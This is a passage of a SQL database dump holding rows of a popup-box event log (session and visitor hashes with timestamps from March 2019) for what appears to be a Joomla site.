(71565, 'ea710023a9c27d68180b965839c2a0fa', '069827ca06c91db5', 0, 2, 1, '2019-03-17 08:24:23'),
(71566, '6a4852ea98ef5b26950dc505c84029c1', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-17 08:24:28'),
(71567, 'ea710023a9c27d68180b965839c2a0fa', '069827ca06c91db5', 0, 2, 1, '2019-03-17 08:24:34'),
(71568, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 08:24:44'),
(71569, '21626c3b92466701a34fac0816da7692', 'b1f252ea7d591555', 0, 2, 1, '2019-03-17 08:24:45'),
(71570, '92abb0ea09cab3c393548788d6210dcb', '274c0c7e8ddc52e4', 0, 2, 1, '2019-03-17 08:24:55'),
(71571, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 08:25:01'),
(71572, '6a4852ea98ef5b26950dc505c84029c1', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-17 08:25:05'),
(71573, '6a4852ea98ef5b26950dc505c84029c1', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-17 08:25:17'),
(71574, '2cecb95b591ec38e7b5208a74772d5c0', '4df0bbb8cabe1372', 0, 2, 1, '2019-03-17 08:25:42'),
(71575, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 08:25:50'),
(71576, '2cecb95b591ec38e7b5208a74772d5c0', '4df0bbb8cabe1372', 0, 2, 1, '2019-03-17 08:26:31'),
(71577, '14a377d9ea403677a75909137bdb73aa', '503a514a8daa32a7', 0, 2, 1, '2019-03-17 08:27:10'),
(71578, 'dba216c356954601cca1ff993e384481', 'f8d002c7b8b76490', 0, 2, 1, '2019-03-17 08:28:00'),
(71579, '16f02b759ecd0581591a3886fcb2e955', '89453d4a3741d6c0', 0, 2, 1, '2019-03-17 08:28:01'),
(71580, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 08:28:13'),
(71581, '16f02b759ecd0581591a3886fcb2e955', '89453d4a3741d6c0', 0, 2, 1, '2019-03-17 08:28:29'),
(71582, '6a4852ea98ef5b26950dc505c84029c1', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-17 08:28:38'),
(71583, '138a7f07dd4e167e8e00c7f9fc74cb60', '9ead839ed439c136', 0, 2, 1, '2019-03-17 08:28:49'),
(71584, '6a4852ea98ef5b26950dc505c84029c1', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-17 08:28:49'),
(71585, '21626c3b92466701a34fac0816da7692', 'b1f252ea7d591555', 0, 2, 1, '2019-03-17 08:29:11'),
(71586, 'dba216c356954601cca1ff993e384481', 'f8d002c7b8b76490', 0, 2, 1, '2019-03-17 08:29:19'),
(71587, '75e1b2f7fe32583207c395b679bd4f66', 'eb2854fabd57280d', 0, 2, 1, '2019-03-17 08:29:53'),
(71588, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 08:30:00'),
(71589, '6b1d55eaa88d2ffa4a232c49b39a9f78', 'd83be9192f556fc0', 0, 2, 1, '2019-03-17 08:30:16'),
(71590, 'dba216c356954601cca1ff993e384481', 'f8d002c7b8b76490', 0, 2, 1, '2019-03-17 08:31:48'),
(71591, '87562e495b277bcdfbc1d1706ddbc4e6', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-03-17 08:33:01'),
(71592, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 08:33:02'),
(71593, '05aac618865ea5b7bc4a01e7be16d341', '06eda58df06a9f5d', 0, 2, 1, '2019-03-17 08:33:27'),
(71594, '3f91b620c074b7676d5e4247aa817e9b', 'd1c27eb4adc98518', 0, 2, 1, '2019-03-17 08:33:53'),
(71595, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 08:33:58'),
(71596, 'dba216c356954601cca1ff993e384481', 'f8d002c7b8b76490', 0, 2, 1, '2019-03-17 08:33:58'),
(71597, '669b8fe733d07035eed957cee328fbc6', 'f85fff0c11466018', 0, 2, 1, '2019-03-17 08:34:04'),
(71598, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 08:34:30'),
(71599, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 08:35:19'),
(71600, '15c8ba60a9bc8cedb65748f109034aac', '4ae0e6974a830cbf', 0, 2, 1, '2019-03-17 08:36:08'),
(71601, 'dcf97365c5c4a7c1dbfcad31a772c894', 'dba49dcafdc2b991', 0, 2, 1, '2019-03-17 08:37:55'),
(71602, '21626c3b92466701a34fac0816da7692', 'b1f252ea7d591555', 0, 2, 1, '2019-03-17 08:38:25'),
(71603, 'c60bed26401c731bdeb4b0785c08daf3', '332e1280bac2817b', 0, 2, 1, '2019-03-17 08:38:57'),
(71604, '05aac618865ea5b7bc4a01e7be16d341', '06eda58df06a9f5d', 0, 2, 1, '2019-03-17 08:39:05'),
(71605, 'ea710023a9c27d68180b965839c2a0fa', '069827ca06c91db5', 0, 2, 1, '2019-03-17 08:39:08'),
(71606, 'c60bed26401c731bdeb4b0785c08daf3', '332e1280bac2817b', 0, 2, 1, '2019-03-17 08:39:29'),
(71607, '05aac618865ea5b7bc4a01e7be16d341', '06eda58df06a9f5d', 0, 2, 1, '2019-03-17 08:39:57'),
(71608, '6a4852ea98ef5b26950dc505c84029c1', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-17 08:40:08'),
(71609, 'dcf97365c5c4a7c1dbfcad31a772c894', 'dba49dcafdc2b991', 0, 2, 1, '2019-03-17 08:40:10'),
(71610, '6a4852ea98ef5b26950dc505c84029c1', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-17 08:40:28'),
(71611, '6a4852ea98ef5b26950dc505c84029c1', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-17 08:40:33'),
(71612, '16f02b759ecd0581591a3886fcb2e955', '89453d4a3741d6c0', 0, 2, 1, '2019-03-17 08:42:02'),
(71613, '05aac618865ea5b7bc4a01e7be16d341', '06eda58df06a9f5d', 0, 2, 1, '2019-03-17 08:42:06'),
(71614, '3f91b620c074b7676d5e4247aa817e9b', 'd1c27eb4adc98518', 0, 2, 1, '2019-03-17 08:42:10'),
(71615, '87562e495b277bcdfbc1d1706ddbc4e6', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-03-17 08:42:17'),
(71616, 'c60bed26401c731bdeb4b0785c08daf3', '332e1280bac2817b', 0, 2, 1, '2019-03-17 08:42:23'),
(71617, '12384e05a64a4727e13e37a006f95d1f', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-17 08:43:27'),
(71618, '12384e05a64a4727e13e37a006f95d1f', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-17 08:43:38'),
(71619, '16f02b759ecd0581591a3886fcb2e955', '89453d4a3741d6c0', 0, 2, 1, '2019-03-17 08:43:38'),
(71620, '05aac618865ea5b7bc4a01e7be16d341', '06eda58df06a9f5d', 0, 2, 1, '2019-03-17 08:44:08'),
(71621, '05aac618865ea5b7bc4a01e7be16d341', '06eda58df06a9f5d', 0, 2, 1, '2019-03-17 08:44:20'),
(71622, '6a4852ea98ef5b26950dc505c84029c1', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-17 08:44:36'),
(71623, 'd1a9c3e4ce7a2fec5d3f9c2142856b06', '37c6d85bc2eb625e', 0, 2, 1, '2019-03-17 08:44:48'),
(71624, '170f51497242074be84bff75715179df', 'ef33699b366746ed', 0, 2, 1, '2019-03-17 08:44:50'),
(71625, '05aac618865ea5b7bc4a01e7be16d341', '06eda58df06a9f5d', 0, 2, 1, '2019-03-17 08:45:57'),
(71626, 'c1ebe6d11f2e879d2030ea5e002a920a', '91d21119de46096c', 0, 2, 1, '2019-03-17 08:46:05'),
(71627, '05aac618865ea5b7bc4a01e7be16d341', '06eda58df06a9f5d', 0, 2, 1, '2019-03-17 08:46:09');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(71628, '16f02b759ecd0581591a3886fcb2e955', '89453d4a3741d6c0', 0, 2, 1, '2019-03-17 08:46:10'),
(71629, '1c2f3c8a90514ffcd16ba4b0ceafa1bf', 'c82195f7827b9487', 0, 2, 1, '2019-03-17 08:46:48'),
(71630, '16f02b759ecd0581591a3886fcb2e955', '89453d4a3741d6c0', 0, 2, 1, '2019-03-17 08:46:59'),
(71631, '21626c3b92466701a34fac0816da7692', 'b1f252ea7d591555', 0, 2, 1, '2019-03-17 08:47:26'),
(71632, '16f02b759ecd0581591a3886fcb2e955', '89453d4a3741d6c0', 0, 2, 1, '2019-03-17 08:47:30'),
(71633, '170f51497242074be84bff75715179df', 'ef33699b366746ed', 0, 2, 1, '2019-03-17 08:47:46'),
(71634, '16f02b759ecd0581591a3886fcb2e955', '89453d4a3741d6c0', 0, 2, 1, '2019-03-17 08:47:47'),
(71635, 'a07dee9c7a2b6a87486452052e13fbce', '93f30eaefda9d8c4', 0, 2, 1, '2019-03-17 08:48:50'),
(71636, '16f02b759ecd0581591a3886fcb2e955', '89453d4a3741d6c0', 0, 2, 1, '2019-03-17 08:50:02'),
(71637, 'd57ae2f977a52b4c0d14ac1cdc10053b', 'f8d002c7b8b76490', 0, 2, 1, '2019-03-17 08:50:09'),
(71638, '3f91b620c074b7676d5e4247aa817e9b', 'd1c27eb4adc98518', 0, 2, 1, '2019-03-17 08:50:23'),
(71639, 'd57ae2f977a52b4c0d14ac1cdc10053b', 'f8d002c7b8b76490', 0, 2, 1, '2019-03-17 08:50:23'),
(71640, '14a377d9ea403677a75909137bdb73aa', '503a514a8daa32a7', 0, 2, 1, '2019-03-17 08:50:30'),
(71641, '2791ea407c238d447b875bf6cde2c958', 'e3413f2163c4f64a', 0, 2, 1, '2019-03-17 08:51:34'),
(71642, 'd57ae2f977a52b4c0d14ac1cdc10053b', 'f8d002c7b8b76490', 0, 2, 1, '2019-03-17 08:51:39'),
(71643, '170f51497242074be84bff75715179df', 'ef33699b366746ed', 0, 2, 1, '2019-03-17 08:52:09'),
(71644, '2cd05dc438a8be6969f31b619969a8ad', 'b53c70bea01d2d6e', 0, 2, 1, '2019-03-17 08:53:23'),
(71645, '0351b95c853d8f84cd2b72c06d4c2caf', 'edfe950d47379572', 0, 2, 1, '2019-03-17 08:54:53'),
(71646, '2cecb95b591ec38e7b5208a74772d5c0', '4df0bbb8cabe1372', 0, 2, 1, '2019-03-17 08:55:36'),
(71647, '421548a0b9d8b50e90509115d4d0a3a1', '44451e386b316e7c', 0, 2, 1, '2019-03-17 08:56:07'),
(71648, '6a4852ea98ef5b26950dc505c84029c1', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-17 08:57:01'),
(71649, '14a377d9ea403677a75909137bdb73aa', '503a514a8daa32a7', 0, 2, 1, '2019-03-17 08:58:08'),
(71650, '221368d3e11b0992b3dfdfdf0de03424', 'cad202a09758cb3a', 0, 2, 1, '2019-03-17 08:58:36'),
(71651, '21626c3b92466701a34fac0816da7692', 'b1f252ea7d591555', 0, 2, 1, '2019-03-17 08:58:45'),
(71652, '21626c3b92466701a34fac0816da7692', 'b1f252ea7d591555', 0, 2, 1, '2019-03-17 09:02:08'),
(71653, '349d43ea9407559677439742ed913bfc', '6eaef0e2df5f44f7', 0, 2, 1, '2019-03-17 09:03:03'),
(71654, 'f58d4d8803dd58124a15217a5278930b', 'dace6e0c219330fc', 0, 2, 1, '2019-03-17 09:03:20'),
(71655, 'fc8e7dd67b528fd488bc04d02e8fc637', 'f10990f26adcd1c5', 0, 2, 1, '2019-03-17 09:05:13'),
(71656, '3f91b620c074b7676d5e4247aa817e9b', 'd1c27eb4adc98518', 0, 2, 1, '2019-03-17 09:05:43'),
(71657, 'e7a6239f3d663fc78e1336cfa32b374a', '6521fe834dce4d43', 0, 2, 1, '2019-03-17 09:06:44'),
(71658, 'd1a9c3e4ce7a2fec5d3f9c2142856b06', '37c6d85bc2eb625e', 0, 2, 1, '2019-03-17 09:07:14'),
(71659, '21626c3b92466701a34fac0816da7692', 'b1f252ea7d591555', 0, 2, 1, '2019-03-17 09:07:23'),
(71660, 'ea710023a9c27d68180b965839c2a0fa', '069827ca06c91db5', 0, 2, 1, '2019-03-17 09:08:28'),
(71661, '349d43ea9407559677439742ed913bfc', '6eaef0e2df5f44f7', 0, 2, 1, '2019-03-17 09:09:10'),
(71662, '349d43ea9407559677439742ed913bfc', '6eaef0e2df5f44f7', 0, 2, 1, '2019-03-17 09:09:33'),
(71663, '81438e31d6a27cb49464f29e92145ed7', 'b0e9c29ed05e8ca4', 0, 2, 1, '2019-03-17 09:09:39'),
(71664, '349d43ea9407559677439742ed913bfc', '6eaef0e2df5f44f7', 0, 2, 1, '2019-03-17 09:09:44'),
(71665, 'b7e46ab67074caa79fbe7c506bb5592f', '0b1466b4de9b8a16', 0, 2, 1, '2019-03-17 09:10:16'),
(71666, 'd57ae2f977a52b4c0d14ac1cdc10053b', 'f8d002c7b8b76490', 0, 2, 1, '2019-03-17 09:10:28'),
(71667, '8ad69b15de3a20539816dfb7985036c0', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-17 09:10:48'),
(71668, '8ad69b15de3a20539816dfb7985036c0', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-17 09:11:11'),
(71669, '8ad69b15de3a20539816dfb7985036c0', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-17 09:11:22'),
(71670, 'a07dee9c7a2b6a87486452052e13fbce', '93f30eaefda9d8c4', 0, 2, 1, '2019-03-17 09:12:17'),
(71671, 'a29915e1f236a9afdee7859967bd44c4', '21a75882f832ae93', 0, 2, 1, '2019-03-17 09:12:56'),
(71672, '1b8bf6c53e97e72709221ddda66c006e', '5d11a454044e400d', 0, 2, 1, '2019-03-17 09:13:33'),
(71673, 'a07dee9c7a2b6a87486452052e13fbce', '93f30eaefda9d8c4', 0, 2, 1, '2019-03-17 09:14:24'),
(71674, '5813b048cc37d6fdb89abce7a6ba166a', '624d6937076d1188', 0, 2, 1, '2019-03-17 09:16:34'),
(71675, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 09:16:49'),
(71676, 'ddc1d846f41cf67b975d38a25a2932f9', '3af9b7e4984c53a2', 0, 2, 1, '2019-03-17 09:16:55'),
(71677, '5813b048cc37d6fdb89abce7a6ba166a', '624d6937076d1188', 0, 2, 1, '2019-03-17 09:16:58'),
(71678, '00bcacbf7ba61711b443d7fb26b9a2b7', 'e3163f1046dc4449', 0, 2, 1, '2019-03-17 09:18:07'),
(71679, '14a377d9ea403677a75909137bdb73aa', '503a514a8daa32a7', 0, 2, 1, '2019-03-17 09:20:05'),
(71680, 'dcf97365c5c4a7c1dbfcad31a772c894', 'dba49dcafdc2b991', 0, 2, 1, '2019-03-17 09:20:24'),
(71681, 'd0d2c2af552d32ecf67497bec7983488', '7501b42c35accff7', 0, 2, 1, '2019-03-17 09:21:45'),
(71682, 'c76cfc0858520b3c9a9044aeb3ab4c0c', '1e8786f2f88c192b', 0, 2, 1, '2019-03-17 09:23:19'),
(71683, '929a99ad82e202f038cd237209bd18bf', '00bc277736589866', 0, 2, 1, '2019-03-17 09:24:07'),
(71684, '5813b048cc37d6fdb89abce7a6ba166a', '624d6937076d1188', 0, 2, 1, '2019-03-17 09:24:44'),
(71685, 'f597c6a22191635cf92134f8d98cbf94', '942461d75b938844', 0, 2, 1, '2019-03-17 09:25:13'),
(71686, '551ff862d147bef826dda97353f829c2', '7689fed16b9efae7', 0, 2, 1, '2019-03-17 09:25:17'),
(71687, '3467bf8d557da0c47be7e141b93ddb3e', '8325464e309c2316', 0, 2, 1, '2019-03-17 09:25:53'),
(71688, '3467bf8d557da0c47be7e141b93ddb3e', '8325464e309c2316', 0, 2, 1, '2019-03-17 09:27:00'),
(71689, 'd1a9c3e4ce7a2fec5d3f9c2142856b06', '37c6d85bc2eb625e', 0, 2, 1, '2019-03-17 09:28:59'),
(71690, '170f51497242074be84bff75715179df', 'ef33699b366746ed', 0, 2, 1, '2019-03-17 09:29:23'),
(71691, 'ea710023a9c27d68180b965839c2a0fa', '069827ca06c91db5', 0, 2, 1, '2019-03-17 09:29:36'),
(71692, '23b6bd77aff4db1a9a7b6beedde8636c', 'd09a3a195511f770', 0, 2, 1, '2019-03-17 09:30:02'),
(71693, '23b6bd77aff4db1a9a7b6beedde8636c', 'd09a3a195511f770', 0, 2, 1, '2019-03-17 09:30:18'),
(71694, '21626c3b92466701a34fac0816da7692', 'b1f252ea7d591555', 0, 2, 1, '2019-03-17 09:30:30'),
(71695, '221368d3e11b0992b3dfdfdf0de03424', 'cad202a09758cb3a', 0, 2, 1, '2019-03-17 09:30:44'),
(71696, '221368d3e11b0992b3dfdfdf0de03424', 'cad202a09758cb3a', 0, 2, 1, '2019-03-17 09:31:54'),
(71697, '5ee38ff5495c6103800409848a6615ce', 'c5b27d2acf4d63c1', 0, 2, 1, '2019-03-17 09:33:47'),
(71698, 'cbaaea585df27ba50d866a40c1f49ed6', '4f8f2dbd3b012e31', 0, 2, 1, '2019-03-17 09:33:51'),
(71699, '0d25c078470835ec2c36c42205e00770', '0bf16c319bd2f666', 0, 2, 1, '2019-03-17 09:34:15'),
(71700, 'cbaaea585df27ba50d866a40c1f49ed6', '4f8f2dbd3b012e31', 0, 2, 1, '2019-03-17 09:34:36'),
(71701, 'c5cdbe6e391ceba211a4d00af5991d8d', 'c4c9002176fd8f74', 0, 2, 1, '2019-03-17 09:35:32'),
(71702, 'b58ae2aff61639f8f587182fa928ed12', 'd33c6b62c31a5365', 0, 2, 1, '2019-03-17 09:36:19'),
(71703, 'bb6f3539a051bcc9cf19d0c02a174724', 'd57c6a47a6711062', 0, 2, 1, '2019-03-17 09:36:22'),
(71704, 'b58ae2aff61639f8f587182fa928ed12', 'd33c6b62c31a5365', 0, 2, 1, '2019-03-17 09:36:33'),
(71705, '748abe97823fb4345f6d36b9af786e49', '19ac418837a1bfb6', 0, 2, 1, '2019-03-17 09:36:40'),
(71706, 'a29915e1f236a9afdee7859967bd44c4', '21a75882f832ae93', 0, 2, 1, '2019-03-17 09:36:42'),
(71707, 'ec18abf6b2c108592c0afa80ffbdeee7', 'c6da2a6f9b230084', 0, 2, 1, '2019-03-17 09:37:12'),
(71708, '748abe97823fb4345f6d36b9af786e49', '19ac418837a1bfb6', 0, 2, 1, '2019-03-17 09:37:55'),
(71709, 'c3f04fab66ad0bf6bd91d8e54dfa916e', 'db225aff0722fa3e', 0, 2, 1, '2019-03-17 09:39:03'),
(71710, 'b58ae2aff61639f8f587182fa928ed12', 'd33c6b62c31a5365', 0, 2, 1, '2019-03-17 09:40:03'),
(71711, 'b58ae2aff61639f8f587182fa928ed12', 'd33c6b62c31a5365', 0, 2, 1, '2019-03-17 09:41:00'),
(71712, 'c2c6dddb04bb3f61901c86877c65f590', '4f8f2dbd3b012e31', 0, 2, 1, '2019-03-17 09:41:26'),
(71713, '21626c3b92466701a34fac0816da7692', 'b1f252ea7d591555', 0, 2, 1, '2019-03-17 09:41:36'),
(71714, '21626c3b92466701a34fac0816da7692', 'b1f252ea7d591555', 0, 2, 1, '2019-03-17 09:41:43'),
(71715, '15e28ae89ac6fb6607316085858af110', 'baa8d16c1a4e5230', 0, 2, 1, '2019-03-17 09:42:46'),
(71716, 'cf152b48811196891ec6371eb79ed3f1', 'edfe950d47379572', 0, 2, 1, '2019-03-17 09:43:04'),
(71717, '1226d7325b504162f0437d372666c1d2', 'a4606350cb27c277', 0, 2, 1, '2019-03-17 09:45:39'),
(71718, '021ccb51181e2ea1f38f5b73a30ff857', '2ea7201b0e939b00', 0, 2, 1, '2019-03-17 09:47:37'),
(71719, '64dffddd4a679869ba75e80622fc51dd', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-03-17 09:49:09'),
(71720, 'e7a6239f3d663fc78e1336cfa32b374a', '6521fe834dce4d43', 0, 2, 1, '2019-03-17 09:50:53'),
(71721, 'e7a6239f3d663fc78e1336cfa32b374a', '6521fe834dce4d43', 0, 2, 1, '2019-03-17 09:51:42'),
(71722, '8bf771ebcc3c111a6a1a0a749bd36564', '92fceb3dfbbbaf7f', 0, 2, 1, '2019-03-17 09:52:33'),
(71723, '8bf771ebcc3c111a6a1a0a749bd36564', '92fceb3dfbbbaf7f', 0, 2, 1, '2019-03-17 09:53:04'),
(71724, '3ca90c6710d438b2ebc69d2ce912b66d', '8bf4306b09063bb5', 0, 2, 1, '2019-03-17 09:53:30'),
(71725, '55ae216f98523a3f954eaedbeafc1ff6', '74aba437eea39f30', 0, 2, 1, '2019-03-17 09:56:01'),
(71726, '9122da6cec5e97d9234b11aeabe28b79', 'f10990f26adcd1c5', 0, 2, 1, '2019-03-17 09:56:15'),
(71727, 'ea710023a9c27d68180b965839c2a0fa', '069827ca06c91db5', 0, 2, 1, '2019-03-17 09:56:34'),
(71728, 'ea710023a9c27d68180b965839c2a0fa', '069827ca06c91db5', 0, 2, 1, '2019-03-17 09:56:47'),
(71729, '6a4852ea98ef5b26950dc505c84029c1', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-17 09:57:44'),
(71730, '170f51497242074be84bff75715179df', 'ef33699b366746ed', 0, 2, 1, '2019-03-17 09:59:25'),
(71731, '221368d3e11b0992b3dfdfdf0de03424', 'cad202a09758cb3a', 0, 2, 1, '2019-03-17 09:59:55'),
(71732, 'bb6f3539a051bcc9cf19d0c02a174724', 'd57c6a47a6711062', 0, 2, 1, '2019-03-17 10:01:01'),
(71733, '4d20775fdacd2d93fde65db203d4e0dc', 'b2bafb74467116e9', 0, 2, 1, '2019-03-17 10:01:19'),
(71734, 'd4e1c10e558752aac6659cc003b30a3b', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-17 10:01:19'),
(71735, 'd4e1c10e558752aac6659cc003b30a3b', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-17 10:01:29'),
(71736, '410079c86232c8c707e6fafd33f9777f', '790fbcccb3362dd5', 0, 2, 1, '2019-03-17 10:01:53'),
(71737, '63d353681e4eb153ed04eb49240fd724', '3eddf244ebb53c2a', 0, 2, 1, '2019-03-17 10:04:14'),
(71738, 'bb6f3539a051bcc9cf19d0c02a174724', 'd57c6a47a6711062', 0, 2, 1, '2019-03-17 10:04:42'),
(71739, 'ffc208240d07d1a9d55a8973c3962624', 'ccf536893deac1fc', 0, 2, 1, '2019-03-17 10:04:56'),
(71740, 'a22c0abc7cd8c045e19b51be791fe655', '41aadccc907ce3ca', 0, 2, 1, '2019-03-17 10:05:33'),
(71741, '7edb0b2242edc2153e58c31752ee5ce4', '85ff275a57db11f5', 0, 2, 1, '2019-03-17 10:05:39'),
(71742, 'bb6f3539a051bcc9cf19d0c02a174724', 'd57c6a47a6711062', 0, 2, 1, '2019-03-17 10:05:49'),
(71743, 'b71b01df2a0b30df5d472ad207940078', '34c47e13358cead7', 0, 2, 1, '2019-03-17 10:06:02'),
(71744, 'ffc208240d07d1a9d55a8973c3962624', 'ccf536893deac1fc', 0, 2, 1, '2019-03-17 10:06:08'),
(71745, 'b71b01df2a0b30df5d472ad207940078', '34c47e13358cead7', 0, 2, 1, '2019-03-17 10:07:12'),
(71746, '7edb0b2242edc2153e58c31752ee5ce4', '85ff275a57db11f5', 0, 2, 1, '2019-03-17 10:08:45'),
(71747, 'b0851316dba4502f5feb6a8f316cdc81', '407198c79af506a8', 0, 2, 1, '2019-03-17 10:08:57'),
(71748, 'ea710023a9c27d68180b965839c2a0fa', '069827ca06c91db5', 0, 2, 1, '2019-03-17 10:11:14'),
(71749, '221368d3e11b0992b3dfdfdf0de03424', 'cad202a09758cb3a', 0, 2, 1, '2019-03-17 10:11:20'),
(71750, 'fc899130defe6a00b8e83558787e67c6', '289af21f88614a48', 0, 2, 1, '2019-03-17 10:13:24'),
(71751, 'a29915e1f236a9afdee7859967bd44c4', '21a75882f832ae93', 0, 2, 1, '2019-03-17 10:13:28'),
(71752, 'fc899130defe6a00b8e83558787e67c6', '289af21f88614a48', 0, 2, 1, '2019-03-17 10:13:36'),
(71753, 'fc899130defe6a00b8e83558787e67c6', '289af21f88614a48', 0, 2, 1, '2019-03-17 10:13:46'),
(71754, '6ccd30b15c21013357df7b7c83fcfb0b', '00369c407644fdc2', 0, 2, 1, '2019-03-17 10:15:26'),
(71755, '221368d3e11b0992b3dfdfdf0de03424', 'cad202a09758cb3a', 0, 2, 1, '2019-03-17 10:15:27'),
(71756, 'ffc208240d07d1a9d55a8973c3962624', 'ccf536893deac1fc', 0, 2, 1, '2019-03-17 10:17:16'),
(71757, 'b986a3daa74736546e5800eccdaa91c7', 'bac71b7e95917c15', 0, 2, 1, '2019-03-17 10:18:46'),
(71758, 'b986a3daa74736546e5800eccdaa91c7', 'bac71b7e95917c15', 0, 2, 1, '2019-03-17 10:19:11'),
(71759, 'c0d705cb01fc8eeb3e6b8f9d9e26e243', '9f6b2d956bfa2fb8', 0, 2, 1, '2019-03-17 10:20:10'),
(71760, 'fc899130defe6a00b8e83558787e67c6', '289af21f88614a48', 0, 2, 1, '2019-03-17 10:21:04'),
(71761, 'fc899130defe6a00b8e83558787e67c6', '289af21f88614a48', 0, 2, 1, '2019-03-17 10:21:13'),
(71762, 'fc899130defe6a00b8e83558787e67c6', '289af21f88614a48', 0, 2, 1, '2019-03-17 10:21:26'),
(71763, '7edb0b2242edc2153e58c31752ee5ce4', '85ff275a57db11f5', 0, 2, 1, '2019-03-17 10:22:11'),
(71764, '6a5a1e4f7fa349d79e34920fe1abb1d5', 'ccf536893deac1fc', 0, 2, 1, '2019-03-17 10:22:39'),
(71765, '3467bf8d557da0c47be7e141b93ddb3e', '8325464e309c2316', 0, 2, 1, '2019-03-17 10:23:53'),
(71766, '9fea4e2eb185c718adb77137d727dbf8', '0b797fb53ae15810', 0, 2, 1, '2019-03-17 10:23:53'),
(71767, 'b986a3daa74736546e5800eccdaa91c7', 'bac71b7e95917c15', 0, 2, 1, '2019-03-17 10:24:01'),
(71768, 'b4e7b6183fd36c15eecd9089f029a925', '06eda58df06a9f5d', 0, 2, 1, '2019-03-17 10:24:48'),
(71769, 'b4e7b6183fd36c15eecd9089f029a925', '06eda58df06a9f5d', 0, 2, 1, '2019-03-17 10:27:14'),
(71770, 'e676ac11918feb1dd403f5dba9a5b901', 'cd809b8cde078906', 0, 2, 1, '2019-03-17 10:27:48'),
(71771, 'e7a6239f3d663fc78e1336cfa32b374a', '6521fe834dce4d43', 0, 2, 1, '2019-03-17 10:28:39'),
(71772, '221368d3e11b0992b3dfdfdf0de03424', 'cad202a09758cb3a', 0, 2, 1, '2019-03-17 10:28:47'),
(71773, 'a07dee9c7a2b6a87486452052e13fbce', '93f30eaefda9d8c4', 0, 2, 1, '2019-03-17 10:29:19'),
(71774, 'a8e7ad6a992b0a7bf3cc22087aa8b289', '16a202b9761a190a', 0, 2, 1, '2019-03-17 10:29:26'),
(71775, '1c2f3c8a90514ffcd16ba4b0ceafa1bf', 'c82195f7827b9487', 0, 2, 1, '2019-03-17 10:30:01'),
(71776, '7b1d92bfd1825b087b5a41066f2e5d9b', 'c7d4ce8b0de12339', 0, 2, 1, '2019-03-17 10:30:44'),
(71777, 'b4e7b6183fd36c15eecd9089f029a925', '06eda58df06a9f5d', 0, 2, 1, '2019-03-17 10:30:50'),
(71778, 'b4e7b6183fd36c15eecd9089f029a925', '06eda58df06a9f5d', 0, 2, 1, '2019-03-17 10:33:03'),
(71779, '410079c86232c8c707e6fafd33f9777f', '790fbcccb3362dd5', 0, 2, 1, '2019-03-17 10:33:39'),
(71780, 'b4e7b6183fd36c15eecd9089f029a925', '06eda58df06a9f5d', 0, 2, 1, '2019-03-17 10:33:42'),
(71781, 'ec18abf6b2c108592c0afa80ffbdeee7', 'c6da2a6f9b230084', 0, 2, 1, '2019-03-17 10:34:24'),
(71782, 'b4e7b6183fd36c15eecd9089f029a925', '06eda58df06a9f5d', 0, 2, 1, '2019-03-17 10:34:35'),
(71783, 'b4e7b6183fd36c15eecd9089f029a925', '06eda58df06a9f5d', 0, 2, 1, '2019-03-17 10:35:00'),
(71784, '9390e271ef2ac674a85dc83cc2fb491f', '36ab569c05d55e5d', 0, 2, 1, '2019-03-17 10:35:22'),
(71785, '08d76f35ab39c1eac7d191bbda8bfb4e', 'b2e78912dacced42', 0, 2, 1, '2019-03-17 10:36:19'),
(71786, '08d76f35ab39c1eac7d191bbda8bfb4e', 'b2e78912dacced42', 0, 2, 1, '2019-03-17 10:36:43'),
(71787, 'abff203b1eea972c260d3d47f47773e1', 'bb75f1a554156e4b', 0, 2, 1, '2019-03-17 10:38:22'),
(71788, '294d4ce39d43930482789bfb7e95a406', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-17 10:38:59'),
(71789, '221368d3e11b0992b3dfdfdf0de03424', 'cad202a09758cb3a', 0, 2, 1, '2019-03-17 10:39:03'),
(71790, '294d4ce39d43930482789bfb7e95a406', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-17 10:39:14'),
(71791, 'b4e7b6183fd36c15eecd9089f029a925', '06eda58df06a9f5d', 0, 2, 1, '2019-03-17 10:39:14'),
(71792, '0956b8a8e722e5899016c128778f17c4', 'df27b9a2919a8206', 0, 2, 1, '2019-03-17 10:40:20'),
(71793, 'f54959b58e5f9e2148c71a7dcc0c203c', '2ea7201b0e939b00', 0, 2, 1, '2019-03-17 10:40:42'),
